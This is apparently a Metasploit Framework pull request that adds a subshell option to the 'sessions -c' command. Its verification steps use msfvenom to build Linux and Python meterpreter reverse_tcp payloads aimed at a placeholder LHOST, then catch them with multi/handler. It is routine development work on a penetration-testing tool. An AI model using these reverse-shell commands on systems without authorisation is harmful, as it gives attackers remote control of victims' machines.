### PR TITLE
Fix #15091, fix sessions -c to use a subshell

### DIFF
--- a/lib/msf/ui/console/command_dispatcher/core.rb
+++ b/lib/msf/ui/console/command_dispatcher/core.rb
@@ -1430,6 +1430,7 @@ class Core
                 process = session.sys.process.execute(c, c_args,
                   {
                     'Channelized' => true,
+                    'Subshell'    => true,
                     'Hidden'      => true
                   })
                 if process && process.channel


### PR DESCRIPTION
Fix https://github.com/rapid7/metasploit-framework/issues/15091

## Verification

List the steps needed to make sure this thing works

- [ ] Get both a linux mettle session and a python session, e.g:
```
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=LHOST LPORT=4444 -f elf -o met
chmod +x met
./met &

msfvenom -p python/meterpreter/reverse_tcp LHOST=LHOST LPORT=4445 -o met.py
python met.py

./msfconsole
use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set lhost LHOST
set lport 4444
run

set payload python/meterpreter/reverse_tcp
set lport 4445
rexploit
```

- [x] **Verify** `session -c 'echo test;'` works the same on both sessions
- [x] **Verify** `session -c 'echo test\;'` works the same on both sessions
- [x] **Verify** `session -c 'echo test && echo end'` works the same on both sessions
